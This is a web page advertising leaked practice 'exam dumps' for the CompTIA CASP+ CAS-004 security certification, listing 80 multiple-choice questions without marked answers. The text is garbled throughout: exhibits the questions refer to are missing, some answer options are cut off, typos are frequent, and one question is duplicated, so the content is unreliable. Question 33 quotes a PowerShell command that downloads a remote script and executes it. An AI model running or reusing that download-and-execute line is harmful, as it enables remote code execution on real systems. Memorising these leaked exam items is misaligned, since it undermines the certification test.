CompTIA Advanced Security Practitioner (CASP+) Certification CAS-004 Updated Exam Dumps

Eleanor2022-09-01T08:53:36+00:00

The CAS-004 exam dumps were updated recently for your CompTIA Advanced Security Practitioner (CASP+) certification:

Exam Code: CAS-004
Exam Name: CompTIA Advanced Security Practitioner (CASP+)
Exam Version: V11.02
Exam Q&As: 231
Up-to-Date: August 27, 2022

Fully prepared with the updated CompTIA CASP+ CAS-004 exam dumps now, the great CAS-004 exam dumps questions of ITPrepare would be the best study materials for CompTIA Advanced Security Practitioner (CASP+) certification exam.

Check the updated CAS-004 exam dumps by reading the CAS-004 free demo below:

Page 1 of 8

1. While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 hours or all data will be destroyed. The company has no response plans for ransomware.

Which of the following is the NEXT step the analyst should take after reporting the incident to the management team?

Pay the ransom within 48 hours.

Isolate the servers to prevent the spread.

Notify law enforcement.

Request that the affected servers be restored immediately.

2. An organization requires a contractual document that includes

• An overview of what is covered

• Goals and objectives

• Performance metrics for each party

• A review of how the agreement is managed by all parties

Which of the following BEST describes this type of contractual document?

SLA

BAA

NDA

ISA

3. A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative, the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online .

Which of the following be the FIRST step taken by the team?

Perform a review of all policies an procedures related to BGP a and DR and created an educated educational module that can be assigned to at employees to provide training on BCP/DR events.

Create an SLA for each application that states when the application will come back online and distribute this information to the business units.

Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.

Implement replication of all servers and application data to back up detacenters that are geographically from the central datacenter and release an upload BPA to all clients.

4. A security analyst is reviewing the following output:

Which of the following would BEST mitigate this type of attack?

Installing a network firewall

Placing a WAF inline

Implementing an IDS

Deploying a honeypot

5. CORRECT TEXT

A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access .

Which of the following risk techniques did the department use in this situation?

. Accept

. Avoid

C. Transfer

D. Mitigate

6. 1.A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks.

Which of the following sources could the architect consult to address this security concern?

SDLC

OVAL

IEEE

OWASP

7. A company security engineer arrives at work to face the following scenario:

1) Website defacement

2) Calls from the company president indicating the website needs to be fixed Immediately because It Is damaging the brand

3) A Job offer from the company's competitor

4) A security analyst's investigative report, based on logs from the past six months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data

Which of the following threat actors Is MOST likely involved?

Organized crime

Script kiddie

APT/nation-state

Competitor

8. A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open-source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.

Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?

Scan the code with a static code analyzer, change privileged user passwords, and provide security training.

Change privileged usernames, review the OS logs, and deploy hardware tokens.

Implement MFA, review the application logs, and deploy a WA

Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities.

9. A security engineer is troubleshooting an issue in which an employee is getting an IP address in the range on the wired network. The engineer plus another PC into the same port, and that PC gets an IP address in the correct range. The engineer then puts the employee’ PC on the wireless network and finds the PC still not get an IP address in the proper range. The PC is up to date on all software and antivirus definitions, and the IP address is not an APIPA address .

Which of the following is MOST likely the problem?

The company is using 802.1x for VLAN assignment, and the user or computer is in the wrong group.

The DHCP server has a reservation for the PC’s MAC address for the wired interface.

The WiFi network is using WPA2 Enterprise, and the computer certificate has the wrong IP address in the SAN field.

The DHCP server is unavailable, so no IP address is being sent back to the P

10. A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief information Security Officer (CISO) must brief board of directors on the potential security concerns related to this migration.

The board is concerned about the following.

* Transactions being required by unauthorized individual

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attacker using email to distribute malware and ransom ware.

* Exfiltration of sensitivity company information.

The cloud-based email solution will provide an6-malware, reputation-based scanning, signature-based scanning, and sandboxing .

Which of the following is the BEST option to resolve the board’s concerns for this email migration?

Data loss prevention

Endpoint detection response

SSL VPN

Application whitelisting

Page 2 of 8

11. An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports.

Which of the following historian server locations will allow the business to get the required reports in an and IT environment?

In the environment, use a VPN from the IT environment into the environment.

In the environment, allow IT traffic into the environment.

In the IT environment, allow PLCs to send data from the environment to the IT environment.

Use a screened subnet between the and IT environments.

12. A security engineer estimates the company’s popular web application experiences 100 attempted breaches per day. In the past four years, the company’s data has been breached two times.

Which of the following should the engineer report as the ARO for successful breaches?

0.5

36,500

13. A host on a company’s network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.

Which of the following steps would be best to perform FIRST?

Turn off the infected host immediately.

Run a full anti-malware scan on the infected host.

Modify the smb.conf file of the host to prevent outgoing SMB connections.

Isolate the infected host from the network by removing all network connections.

14. The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified .

Which of the following should the incident response team perform to understand the crash and prevent it in the future?

Root cause analysis

Continuity of operations plan

After-action report

Lessons learned

15. An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.

Which of the following side-channel attacks did the team use?

Differential power analysis

Differential fault analysis

Differential temperature analysis

Differential timing analysis

16. The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.

Which of the following testing methods would be BEST for the engineer to utilize in this situation?

Software composition analysis

Code obfuscation

Static analysis

Dynamic analysis

17. A company's Chief Information Officer wants to Implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide Information on attempted attacks, and provide analysis of malicious activities to determine the processes or users Involved .

Which of the following would provide this information?

HIPS

UEBA

HlDS

NIDS

18. An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact.

Which of the following should the organization perform NEXT?

Assess the residual risk.

Update the organization’s threat model.

Move to the next risk in the register.

Recalculate the magnitude of impact.

19. Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage .

Which of the following should be created to prevent this type of issue in the future?

SLA

BIA

BCM

BCP

RTO

20. A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but the CIRT finds undocumented services running on the device .

Which of the following controls would reduce the discovery time for similar in the future?

Implementing application blacklisting

Configuring the mall to quarantine incoming attachment automatically

Deploying host-based firewalls and shipping the logs to the SIEM

Increasing the cadence for antivirus DAT updates to twice daily

Page 3 of 8

21. A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.

Which of the following systems should the consultant review before making a recommendation?

CAN

ASIC

FPGA

SCADA

22. Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts partial responsibility for application-level controls to the cloud provider.

In the shared responsibility model, which of the following levels of service meets this requirement?

laaS

SaaS

FaaS

PaaS

23. A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company’s Linux servers. While the software version is no longer supported by the OSS community, the company’s Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.

Based on this agreement, this finding is BEST categorized as a:

true positive.

true negative.

false positive.

false negative.

24. Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution?

Biometric authenticators are immutable.

The likelihood of account compromise is reduced.

Zero trust is achieved.

Privacy risks are minimized.

25. An auditor needs to scan documents at rest for sensitive text. These documents contain both text and Images .

Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Select TWO).

Document interpolation

Regular expression pattern matching

Optical character recognition functionality

Baseline image matching

Advanced rasterization

Watermarking

26. Company A acquired Company. During an audit, a security engineer found Company B’s environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A’s security program.

Which of the following risk-handling techniques was used?

Avoid

Transfer

Mitigate

27. A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems .

Which of the following now describes the level of risk?

Inherent

Low

Mitigated

Residual.

Transferred

28. A disaster recovery team learned of several mistakes that were made during the last disaster recovery parallel test. Computational resources ran out at 70% of restoration of critical services.

Which of the following should be modified to prevent the issue from reoccurring?

Recovery point objective

Recovery time objective

Mission-essential functions

Recovery service level

29. A security analyst is reviewing the following vulnerability assessment report:

Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?

Server1

Server2

Server 3

Servers

30. An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment’s notice.

Which of the following should the organization consider FIRST to address this requirement?

Implement a change management plan to ensure systems are using the appropriate versions.

Hire additional on-call staff to be deployed if an event occurs.

Design an appropriate warm site for business continuity.

Identify critical business processes and determine associated software and hardware requirements.

Page 4 of 8

31. A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.

Which of the following BEST describes the type of malware the solution should protect against?

Worm

Logic bomb

Fileless

Rootkit

32. A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.

Which of the following does the business’s IT manager need to consider?

The availability of personal data

The right to personal data erasure

The company’s annual revenue

The language of the web application

33. A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

Antivirus and UEBA

Reverse proxy and sandbox

EDR and application approved list

Forward proxy and MFA

34. An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During the last two holiday seasons, the server experienced performance issues because of too many connections, and several customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this kind of performance issue.

Which of the following is the MOST cost-effective solution?

Move the server to a cloud provider.

Change the operating system.

Buy a new server and create an active-active cluster.

Upgrade the server with a new one.

35. All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools. The human resources department wants to use these tools to process sensitive information but is concerned the data could be:

Leaked to the media via printing of the documents

Sent to a personal email address

Accessed and viewed by systems administrators

Uploaded to a file storage site

Which of the following would mitigate the department’s concerns?

Data loss detection, reverse proxy, EDR, and PGP

VDI, proxy, CASB, and DRM

Watermarking, forward proxy, DLP, and MFA

Proxy, secure VPN, endpoint encryption, and AV

36. Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?

Isolation control failure

Management plane breach

Insecure data deletion

Resource exhaustion

37. Which of the following are risks associated with vendor lock-in? (Choose two.)

The client can seamlessly move data.

The vendor can change product offerings.

The client receives a sufficient level of service.

The client experiences decreased quality of service.

The client can leverage a multicloud approach.

The client experiences increased interoperability.

38. A company’s Chief Information Security Officer is concerned that the company’s proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.

Which of the following compensating controls would be BEST to implement in this situation?

EDR

SIEM

HIDS

UEBA

39. An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PI I and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards.

The assessment identifies the following:

1) There will be a 520,000 per day revenue loss for each day the system is delayed going into production.

2) The inherent risk is high.

3) The residual risk is low.

4) There will be a staged deployment to the solution rollout to the contact center.

Which of the following risk-handling techniques will BEST meet the organization's requirements?

Apply for a security exemption, as the risk is too high to accept.

Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service.

Accept the risk, as compensating controls have been implemented to manage the risk.

Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.

40. A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used. The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.

Which of the following encryption methods should the cloud security engineer select during the implementation phase?

Instance-based

Storage-based

Proxy-based

Array controller-based

Page 5 of 8

41. A security engineer is hardening a company’s multihomed SFTP server.

When scanning a public-facing network interface, the engineer finds the following ports are open:

22

25

110

137

138

139

445

Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company’s distribution process.

Which of the following would be the BEST solution to harden the system?

Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface.

Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface.

Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface.

Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.

42. A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive.

Based on the output above, from which of the following process IDs can the analyst begin an investigation?

43. The Chief information Security Officer (CISO) of a small locate bank has a compliance requirement that a third-party penetration test of the core banking application must be conducted annually .

Which of the following services would fulfill the compliance requirement with the LOWEST resource usage?

Black-box testing

Gray-box testing

Red-team hunting

White-box testing

Blue-learn exercises

44. During a remodel, a company’s computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.

Which of the following processes would BEST satisfy this requirement?

Monitor camera footage corresponding to a valid access request.

Require both security and management to open the door.

Require department managers to review denied-access requests.

Issue new entry badges on a weekly basis.

45. An organization’s assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API.

Given this information, which of the following is a noted risk?

Feature delay due to extended software development cycles

Financial liability from a vendor data breach

Technical impact to the API configuration

The possibility of the vendor’s business ceasing operations

46. A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization’s headquarters location. The solution must also have the lowest power requirement on the CA.

Which of the following is the BEST solution?

Deploy an RA on each branch office.

Use Delta CRLs at the branches.

Configure clients to use OCS

Send the new CRLs by using GP

47. A cybersecurity analyst created the following tables to help determine the maximum budget amount the business can justify spending on an improved email filtering system:

Which of the following meets the budget needs of the business?

Filter ABC

Filter XYZ

Filter GHI

Filter TUV

48. A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.

Which of the following should be the analyst’s FIRST action?

Create a full inventory of information and data assets.

Ascertain the impact of an attack on the availability of crucial resources.

Determine which security compliance standards should be followed.

Perform a full system penetration test to determine the vulnerabilities.

49. A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.

Which of the following techniques would BEST support this?

Configuring systemd services to run automatically at startup

Creating a backdoor

Exploiting an arbitrary code execution exploit

Moving laterally to a more authoritative server/service

50. An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems .

Which of the following is the MOST likely security consequence of this attack?

A turbine would overheat and cause physical harm.

The engineers would need to go to the historian.

The SCADA equipment could not be maintained.

Data would be exfiltrated through the data diodes.

Page 6 of 8

51. An auditor Is reviewing the logs from a web application to determine the source of an Incident. The web application architecture Includes an Internet-accessible application load balancer, a number of web servers In a private subnet, application servers, and one database server In a tiered configuration. The application load balancer cannot store the logs.

The following are sample log snippets:

Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources?

Enable the x-Forwarded-For header al the load balancer.

Install a software-based HIDS on the application servers.

Install a certificate signed by a trusted C

Use stored procedures on the database server.

Store the value of the $_server ( ‘ REMOTE_ADDR ' ] received by the web servers.

52. A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.

Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

NAC to control authorized endpoints

FIM on the servers storing the data

A jump box in the screened subnet

A general VPN solution to the primary network

53. A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system .

Which of the following security responsibilities will the DevOps team need to perform?

Securely configure the authentication mechanisms

Patch the infrastructure at the operating system

Execute port scanning against the services

Upgrade the service as part of life-cycle management

54. Over the last 90 days, many storage services has been exposed in the cloud services environments, and the security team does not have the ability to see is creating these instance. Shadow IT is creating data services and instances faster than the small security team can keep up with them. The Chief information security Officer (CIASO) has asked the security officer (CISO) has asked the security lead architect to architect to recommend solutions to this problem.

Which of the following BEST addresses the problem best address the problem with the least amount of administrative effort?

Compile a list of firewall requests and compare than against interesting cloud services.

Implement a CASB solution and track cloud service use cases for greater visibility.

Implement a user-behavior system to associate user events and cloud service creation events.

Capture all log and feed then to a SIEM and then for cloud service events

55. A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated Oss .

Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

Segment the systems to reduce the attack surface if an attack occurs

Migrate the services to new systems with a supported and patched O

Patch the systems to the latest versions of the existing OSs

Install anti-malware. HIPS, and host-based firewalls on each of the systems

56. Device event logs sources from MDM software as follows:

Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?

Malicious installation of an application; change the MDM configuration to remove application ID 1220.

Resource leak; recover the device for analysis and clean up the local storage.

Impossible travel; disable the device’s account and access while investigating.

Falsified status reporting; remotely wipe the device.

57. A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.

Which of the following would BEST secure the company’s CI/CD pipeline?

Utilizing a trusted secrets manager

Performing DAST on a weekly basis

Introducing the use of container orchestration

Deploying instance tagging

58. A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.

Which of the following would BEST safeguard the APIs? (Choose two.)

Bot protection

OAuth 2.0

Input validation

Autoscaling endpoints

Rate limiting

CSRF protection

59. A SOC analyst is reviewing malicious activity on an external, exposed web server. During the investigation, the analyst determines specific traffic is not being logged, and there is no visibility from the WAF for the web application.

Which of the following is the MOST likely cause?

The user agent client is not compatible with the WA

A certificate on the WAF is expired.

HTTP traffic is not forwarding to HTTPS to decrypt.

Old, vulnerable cipher suites are still being used.

60. A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:

As part of the image process, which of the following is the FIRST step the analyst should take?

Block the email address carl b@comptia1 com, as it is sending spam to subject matter experts

Validate the final "Received" header against the DNS entry of the domain.

Compare the 'Return-Path" and "Received" fields.

Ignore the emails, as SPF validation is successful, and it is a false positive

Page 7 of 8

61. Which of the following controls primarily detects abuse of privilege but does not prevent it?

Off-boarding

Separation of duties

Least privilege

Job rotation

62. A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.

Which of the following should a security architect recommend?

A DLP program to identify which files have customer data and delete them

An ERP program to identify which processes need to be tracked

A CMDB to report on systems that are not configured to security baselines

A CRM application to consolidate the data and provision access based on the process and need

63. An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access.

Which of the following describes the administrator’s discovery?

A vulnerability

A threat

A breach

A risk

64. An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors .

Which of the following categories BEST describes this type of vendor risk?

SDLC attack

Side-load attack

Remote code signing

Supply chain attack

65. An organization recently started processing, transmitting, and storing its customers’ credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers’ information.

Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?

NIST

GDPR

PCI DSS

ISO

66. A company just released a new video card. Due to limited supply and nigh demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's Intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems .

Which of the following now describes the level of risk?

Inherent Low

Mitigated

Residual

Transferred

67. An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.

Which of the following phases establishes the identification and prioritization of critical systems and functions?

Review a recent gap analysis.

Perform a cost-benefit analysis.

Conduct a business impact analysis.

Develop an exposure factor matrix.

68. Immediately following the report of a potential breach, a security engineer creates a forensic image of the server in question as part of the organization incident response procedure .

Which of the must occur to ensure the integrity of the image?

The image must be password protected against changes.

A hash value of the image must be computed.

The disk containing the image must be placed in a seated container.

A duplicate copy of the image must be maintained

69. A developer wants to maintain integrity to each module of a program and ensure the code cannot be altered by malicious users.

Which of the following would be BEST for the developer to perform? (Choose two.)

Utilize code signing by a trusted third party.

Implement certificate-based authentication.

Verify MD5 hashes.

Compress the program with a password.

Encrypt with 3DE

Make the DACL read-only.

70. A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the Docker host due to a single application that is overconsuming available resources.

Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?

Union filesystem overlay

Cgroups

Linux namespaces

Device mapper

Page 8 of 8

71. A security analyst observes the following while looking through network traffic in a company's cloud log:

Which of the following steps should the security analyst take FIRST?

Quarantine 10.0.5.52 and run a malware scan against the host.

Access 10.0.5.52 via EDR and identify processes that have network connections.

Isolate 10.0.50.6 via security groups.

Investigate web logs on 10.0.50.6 to determine if this is normal traffic.

72. A security engineer is reviewing a record of events after a recent data breach incident that

Involved the following:

• A hacker conducted reconnaissance and developed a footprint of the company s Internet-facing web application assets.

• A vulnerability in a third-party horary was exploited by the hacker, resulting in the compromise of a local account.

• The hacker took advantage of the account's excessive privileges to access a data store and exfilltrate the data without detection.

Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?

Dynamic analysis

Secure web gateway

Software composition analysis

User behavior analysis

Web application firewall

73. An organization is implementing a new identity and access management architecture with the following objectives:

Supporting MFA against on-premises infrastructure

Improving the user experience by integrating with SaaS applications

Applying risk-based policies based on location

Performing just-in-time provisioning

Which of the following authentication protocols should the organization implement to support these requirements?

Kerberos and TACACS

SAML and RADIUS

OAuth and OpenID

OTP and 802.1X

74. An engineering team is developing and deploying a fleet of mobile devices to be used for specialized inventory management purposes.

These devices should:

* Be based on open-source Android for user familiarity and ease.

* Provide a single application for inventory management of physical assets.

* Permit use of the camera be only the inventory application for the purposes of scanning

* Disallow any and all configuration baseline modifications.

* Restrict all access to any device resource other than those requirement ?

Set an application wrapping policy, wrap the application, distributes the inventory APK via the MAM tool, and test the application restrictions.

Write a MAC sepolicy that defines domains with rules, label the inventory application, build the policy, and set to enforcing mode.

Swap out Android Linux kernel version for >2,4,0, but the internet build Android, remove unnecessary functions via MDL, configure to block network access, and perform integration testing

Build and install an Android middleware policy with requirements added, copy the file into/ user/init, and then built the inventory application.

75. A large telecommunications equipment manufacturer needs to evaluate the strengths of security controls in a new telephone network supporting first responders .

Which of the following techniques would the company use to evaluate data confidentiality controls?

Eavesdropping

On-path

Cryptanalysis

Code signing

RF sidelobe sniffing

76. A threat analyst notices the following URL while going through the HTTP logs.

Which of the following attack types is the threat analyst seeing?

SQL injection

CSRF

Session hijacking

XSS

77. A security architect is reviewing the following proposed corporate firewall architecture and configuration:

Both firewalls are stateful and provide Layer 7 filtering and routing.

The company has the following requirements:

Web servers must receive all updates via HTTP/S from the corporate network.

Web servers should not initiate communication with the Internet.

Web servers should only connect to preapproved corporate database servers.

Employees’ computing devices should only connect to web services over ports 80 and 443.

Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

78. A developer wants to develop a secure external-facing web application. The developer is looking for an online community that produces tools, methodologies, articles, and documentation in the field of

web-application security.

Which of the following is the BEST option?

ICANN

PCI DSS

OWASP

CSA

NIST

79. UESTION NO: 36

Which of the following is a benefit of using steganalysis techniques in forensic response?

Breaking a symmetric cipher used in secure voice communications

Determining the frequency of unique attacks against DRM-protected media

Maintaining chain of custody for acquired evidence

Identifying least significant bit encoding of data in a .wav file

80. A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed .

Which of the following should the analyst use to create the list quickly?

Business impact rating

CVE dates

CVSS scores

OVAL

CompTIA Advanced Security Practitioner (CASP+) Certification CAS-004 Updated Exam Dumps